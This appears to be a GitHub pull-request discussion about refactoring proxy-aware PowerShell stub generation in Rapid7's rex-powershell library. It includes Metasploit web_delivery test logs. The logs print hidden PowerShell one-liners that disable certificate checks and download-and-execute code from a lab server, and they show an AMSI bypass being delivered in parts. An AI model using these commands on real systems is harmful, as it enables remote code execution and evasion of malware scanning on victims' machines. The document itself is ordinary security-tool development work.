search

rapid7 / rex-powershell

Rex library for dealing with Powershell Scripts
Other
53 stars 35 forks source link

Update proxy aware script generation #41

Closed cdelafuente-r7 closed 1 year ago

cdelafuente-r7 commented 1 year ago

This PR is a simple update to the method responsible of generating the Powershell stub that uses the default system web proxy and credentials. The logic has been extracted and moved to a new method self.proxy_aware. The original method self.proxy_aware_download_and_exec_string now calls it before concatenating the "download and exec" logic.

These changes are needed by this Metasploit's PR.

Testing

The easiest way to test this is to follow the steps listed in this PR.

jheysel-r7 commented 1 year ago

This change has fixed the issue previously being seen when testing https://github.com/rapid7/metasploit-framework/pull/17942. Thanks @cdelafuente-r7!

Testing check's out:

msf6 > use  multi/script/web_delivery
[*] Using configured payload windows/x64/exec
msf6 exploit(multi/script/web_delivery) > set payload payload/windows/x64/exec
payload => windows/x64/exec
msf6 exploit(multi/script/web_delivery) > set target 2
target => 2
msf6 exploit(multi/script/web_delivery) > set cmd calc.exe
[-] Unknown datastore option: cmd.
msf6 exploit(multi/script/web_delivery) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(multi/script/web_delivery) > set SRVHOST 172.16.199.1
SRVHOST => 172.16.199.1
msf6 exploit(multi/script/web_delivery) > options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  172.16.199.1     yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      true             no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (windows/x64/exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD       calc.exe         yes       The command string to execute
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)

Exploit target:

   Id  Name
   --  ----
   2   PSH

View the full module info with the info, or info -d command.

msf6 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) >
[*] Using URL: https://172.16.199.1:8080/PpsLxPdHAj
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/PpsLxPdHAj/s4y1988'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/PpsLxPdHAj/l8mjG5uXTteHBoh'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/PpsLxPdHAj/5vQTHmZDvYctdwk/1'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/PpsLxPdHAj'));
msf6 exploit(multi/script/web_delivery) > [*] 172.16.199.138   web_delivery - Delivering ForceTLS12 command (78 bytes)
[*] 172.16.199.138   web_delivery - Delivering Proxy Aware command (203 bytes)
[*] 172.16.199.138   web_delivery - Delivering AMSI Bypass 1/1(1601 bytes)
[*] 172.16.199.138   web_delivery - Powershell command length: 2101
[*] 172.16.199.138   web_delivery - Delivering Payload (2101 bytes)

Screenshot 2023-06-12 at 12 56 53 PM

msf6 exploit(multi/script/web_delivery) > set PSH-AmsiBypassSplit 5
PSH-AmsiBypassSplit => 5
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Using URL: https://172.16.199.1:8080/8PdWHFVF7ZLso
[*] Server started.
[*] Run the following command on the target machine:
msf6 exploit(multi/script/web_delivery) > [*] Splitting bypass protection script in 5 parts
powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/JAGui4aIHA'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/XsPNfTP'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/1'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/2'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/3'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/4'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/5'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso'));
[*] 172.16.199.138   web_delivery - Delivering ForceTLS12 command (78 bytes)
[*] 172.16.199.138   web_delivery - Delivering Proxy Aware command (203 bytes)
[*] 172.16.199.138   web_delivery - Delivering AMSI Bypass 1/5(751 bytes)
[*] 172.16.199.138   web_delivery - Delivering AMSI Bypass 2/5(392 bytes)
[*] 172.16.199.138   web_delivery - Delivering AMSI Bypass 3/5(81 bytes)
[*] 172.16.199.138   web_delivery - Delivering AMSI Bypass 4/5(30 bytes)
[*] 172.16.199.138   web_delivery - Delivering AMSI Bypass 5/5(351 bytes)
[*] 172.16.199.138   web_delivery - Powershell command length: 2069
[*] 172.16.199.138   web_delivery - Delivering Payload (2069 bytes)

Screenshot 2023-06-12 at 1 06 31 PM